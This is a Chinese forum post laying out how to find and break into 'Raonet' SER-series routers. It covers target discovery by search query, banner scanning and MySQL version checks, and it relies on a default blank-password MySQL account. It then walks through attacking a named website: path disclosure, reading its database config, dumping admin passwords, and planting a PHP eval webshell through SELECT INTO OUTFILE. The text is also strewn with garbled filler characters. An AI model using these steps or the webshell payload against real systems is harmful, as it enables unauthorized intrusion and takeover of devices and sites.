寻找存在漏洞的路由器方法:' i/ {' p% C2 _, h& ^+ F1 ^
: l) v5 ^) r& w4 v1:google搜索'Raonet Subscriber Ethernet Router'
1 X* Q) s& y* n! E# q+ G
2 O1 T" T. {" t2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001) P$ m' B8 \3 O$ c
7 j4 w! q! w! t6 y% t; K3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
. O' A! L( Y% O" N. E3 V W
6 b9 A& N; i7 O2 V Q//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
2 t- F/ a9 m7 M( ]$ Y! J
2 P3 t; o g+ q" }. S/ M
% [, ^! I5 L# |- H8 {1 R
$ D; O D0 W( p7 O2 ^0 H! J入侵步骤:( m5 Z% }) @. T F c5 ]% Q% N
9 F8 O3 x7 w3 o2 B% V3 `1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
' _: l8 |0 I0 R$ ~/ w: c" d# B h% j8 T8 s+ c
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc9 X0 z/ p. d* g: ~( q
3:得到密码后连接,查看GUI管理密码: ]- W+ L( ^6 S5 s
use ser_5000 B+ C4 d* P1 ]" \8 o( \
select id,passwd from user;9 z& s" q- \- Y! J0 b1 G5 a6 I h
4:通过数据库写入webshell,执行命令:' N6 X, l) M( P+ t
use mysql; K! m4 ^5 `6 G* z Y
create table ok(cmd TEXT);4 R' y; |1 x$ d6 j6 b) h. d
insert into ok values("<?php @eval($_POST[cmd])?>");7 M; V8 ]8 T) L) r1 Z7 W9 k
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
/ i3 f l" v9 ^; c9 A* ~drop table ok;4 C. L6 M( k2 }0 x) T( G# g
! l7 p/ g1 ]1 g* A6 l8 K5:连接后门shell.php 2 Q" H# N _5 A4 S
( l; o9 K3 a' A& Z$ {" }6 s
6. 搞定!+ [: S. j) [+ p! V# k
( i: ~/ `8 b( I( F6 Q
|
发表于 2012-12-10 10:30:18
收藏
支持
反对
发表于 2013-7-27 20:06:50